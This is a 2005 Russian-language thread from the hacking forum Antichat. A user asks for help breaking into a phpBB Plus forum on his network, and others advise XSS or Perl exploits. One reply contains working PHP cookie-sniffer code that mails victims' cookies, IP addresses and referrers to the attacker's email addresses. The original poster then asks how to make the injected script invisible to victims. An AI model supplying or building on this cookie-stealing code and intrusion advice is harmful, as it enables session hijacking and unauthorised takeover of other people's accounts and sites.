Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Взлом PHPBB Plus (https://forum.antichat.xyz/showthread.php?t=11313)

cardons 04.12.2005 04:31
Взлом PHPBB Plus
 
Подскажите как его ломануть очень надо.По XSS нейподет этот сайт у меня в сети.

DeathLess 04.12.2005 09:48
Почему это XSS непойдет? Главное понимать принципы. Если это web-чат то ничего тебе не мешает использовать там xss.

m0nzt3r 04.12.2005 11:54
DeathLess какой веб чат?? это пхпбб форум
cardons, пробуй хсс , перл сплойты ( но лучший и рабочий вариант ХСС , если не конечно не самая последняя версия форума)

byte57 04.12.2005 12:21
ну, во-первых, кросс-сайт-скриптинг не тока в интернете работает), ты же можешь прям в сети сниффер разместить у себя на хосте, что к сожалению при обнаружении атаки плохо отразится на твоей безопасности...

-простейший сниффер:
Код:
<?
if(isset($QUERY_STRING))
{
$date=date('d.m.y : H:i:s');
mail("mail1@mail.ru, mail2@mail.ru", "Kyka npuIIIJIa", "Date and Time: $date\n IP: $REMOTE_ADDR\n Adress: $HTTP_REFERER\n Cookie: $QUERY_STRING");
}
?>
- правда лучше сделай чтобы в файл писалось, чтобы не заморачиваться с мэйл серваками... (мануалы по php или перлу ищи на emanual.ru)

Во-вторых, насколько я понял, это все тот же форум phpbb, а вовсе не чат, но так и не нашел ответа, отличается ли он чем-нить от простого? (без плюса)

В третьих, не верится, что существует лишь одна рабочая версия этого форума, так что плз, пиши сюда нам версию, либо сам смотри на сайтах http://www.security.nnov.ru/
http://securitylab.ru/

cardons 05.12.2005 08:15
Версия 1.52.Cплойтов у меня нету нифига.Щас доделаю сниф тока что писать как для простого phpbb?Просто подскажите что писать чтоб небыло видно этого текста.

byte57 05.12.2005 15:11
найди похожую системку в инете, ковыряться надо...


Время: 04:00